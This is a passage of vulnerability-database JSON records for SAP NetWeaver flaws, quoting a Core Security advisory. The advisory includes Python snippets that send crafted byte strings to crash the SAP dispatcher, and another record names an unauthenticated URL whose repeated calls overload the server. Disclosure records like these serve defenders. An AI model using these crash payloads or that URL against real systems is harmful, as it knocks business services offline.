\"X\"*114 + \"\\xff\\xff\" # --\u003e Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. \n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. \n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. \n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012. 2012-01-24:\nCore sends an advisory draft with technical details. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP\u0027s\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP\u0027s guidelines as much as possible. 2012-02-21:\nFirst release date missed. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012. 2012-02-23:\nCore re-schedules the advisory publication to May 8th. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received). 2012-05-07:\nCore asks again for the status of the fix. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8]. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information. 2012-05-08:\nAdvisory CORE-2012-0123 published. \n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP\u0027s legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910. \n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com. \n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations. \n\nCore Security\u0027s software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company\u0027s Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com. \n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc",
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"db": "PACKETSTORM",
"id": "112538"
}
],
"trust": 1.71
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2011-1517",
"trust": 2.5
},
{
"db": "BID",
"id": "53424",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2011-005602",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201205-158",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "112538",
"trust": 0.1
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
]
},
"id": "VAR-202002-0024",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T12:22:02.422000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2011-1517"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/75452"
},
{
"trust": 1.6,
"url": "http://archives.neohapsis.com/archives/bugtraq/2012-05/0061.html"
},
{
"trust": 1.6,
"url": "http://www.securityfocus.com/bid/53424"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1517"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2011-1517"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/services-overview-core-security-consulting-services."
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2511"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2011-1516"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/files/attachments/core_security_advisories.asc."
},
{
"trust": 0.1,
"url": "http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2513"
},
{
"trust": 0.1,
"url": "http://www.coresecurity.com/content/corelabs-advisories"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2514"
},
{
"trust": 0.1,
"url": "https://service.sap.com/sap/support/notes/1687910."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2012-2512"
},
{
"trust": 0.1,
"url": "http://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46."
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"date": "2012-05-08T15:15:15",
"db": "PACKETSTORM",
"id": "112538"
},
{
"date": "2020-02-05T23:15:11.177000",
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"date": "2012-05-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-02-21T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2011-005602"
},
{
"date": "2020-02-07T19:09:32.427000",
"db": "NVD",
"id": "CVE-2011-1517"
},
{
"date": "2020-02-12T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "112538"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-158"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2011-005602"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "112538"
}
],
"trust": 0.1
}
}
var-201011-0282
Vulnerability from variot
SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP Netweaver Metamodel Repository is accessible by default in the old SAP ECC version without authentication. The attacker can access the test performance page: http://sapserver:8000/mmr/MMR?page=MMRPerformance if used max. Data size for performance testing, the server will consume 100% CPU. The attacker writes a script that calls this script 100, and the server will not respond for a long time. SAP NetWeaver is prone to a remote denial-of-service vulnerability An attacker can exploit this issue to cause a high CPU load and make the application unresponsive, denying service to legitimate users
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201011-0282",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.1,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"db": "BID",
"id": "44903"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alexandr Polyakov from Digital Security Research Group [DSecRG]",
"sources": [
{
"db": "BID",
"id": "44903"
}
],
"trust": 0.3
},
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": null,
"accessVector": null,
"authentication": null,
"author": "IVD",
"availabilityImpact": null,
"baseScore": null,
"confidentialityImpact": null,
"exploitabilityScore": null,
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d",
"impactScore": null,
"integrityImpact": null,
"severity": null,
"trust": 0.2,
"vectorString": null,
"version": "unknown"
}
],
"cvssV3": [],
"severity": [
{
"author": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d",
"trust": 0.2,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. The SAP Netweaver Metamodel Repository is accessible by default in the old SAP ECC version without authentication. The attacker can access the test performance page: http://sapserver:8000/mmr/MMR?page=MMRPerformance if used max. Data size for performance testing, the server will consume 100% CPU. The attacker writes a script that calls this script 100, and the server will not respond for a long time. SAP NetWeaver is prone to a remote denial-of-service vulnerability\nAn attacker can exploit this issue to cause a high CPU load and make the application unresponsive, denying service to legitimate users",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"db": "BID",
"id": "44903"
},
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "44903",
"trust": 0.9
},
{
"db": "CNVD",
"id": "CNVD-2010-2861",
"trust": 0.8
},
{
"db": "IVD",
"id": "91C4D682-1FA8-11E6-ABEF-000C29C66E3D",
"trust": 0.2
}
],
"sources": [
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"db": "BID",
"id": "44903"
}
]
},
"id": "VAR-201011-0282",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2861"
}
],
"trust": 1.06917922
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS"
],
"sub_category": null,
"trust": 0.8
}
],
"sources": [
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2861"
}
]
},
"last_update_date": "2022-05-17T01:48:45.065000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP NetWeaver Security bypasses denial of service vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/1775"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2861"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 0.6,
"url": "http://dsecrg.com/pages/vul/show.php?id=206http"
},
{
"trust": 0.3,
"url": "http://dsecrg.com/pages/vul/show.php?id=206"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.3,
"url": "https://service.sap.com/sap/support/notes/1484097"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"db": "BID",
"id": "44903"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"db": "BID",
"id": "44903"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-18T00:00:00",
"db": "IVD",
"id": "91c4d682-1fa8-11e6-abef-000c29c66e3d"
},
{
"date": "2010-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"date": "2010-11-17T00:00:00",
"db": "BID",
"id": "44903"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2010-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"date": "2010-11-17T00:00:00",
"db": "BID",
"id": "44903"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "44903"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Security Bypass Denial of Service Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2010-2861"
},
{
"db": "BID",
"id": "44903"
}
],
"trust": 0.9
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Access Validation Error",
"sources": [
{
"db": "BID",
"id": "44903"
}
],
"trust": 0.3
}
}
var-201803-1755
Vulnerability from variot
SAP NetWeaver Portal, WebDynpro Java, 7.30, 7.31, 7.40, 7.50, does not sufficiently encode user controlled inputs, resulting in Cross-Site Scripting (XSS) vulnerability. Remote attackers can exploit this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201803-1755",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver portal",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver portal",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver portal",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver portal",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver portal",
"scope": null,
"trust": 0.8,
"vendor": "sap",
"version": null
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.50"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "0"
}
],
"sources": [
{
"db": "BID",
"id": "102999"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-002507"
},
{
"db": "NVD",
"id": "CVE-2018-2365"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-035"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_portal:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_portal:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_portal:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver_portal:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-2365"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The vendor reported this issue.",
"sources": [
{
"db": "BID",
"id": "102999"
}
],
"trust": 0.3
},
"cve": "CVE-2018-2365",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-2365",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-2365",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
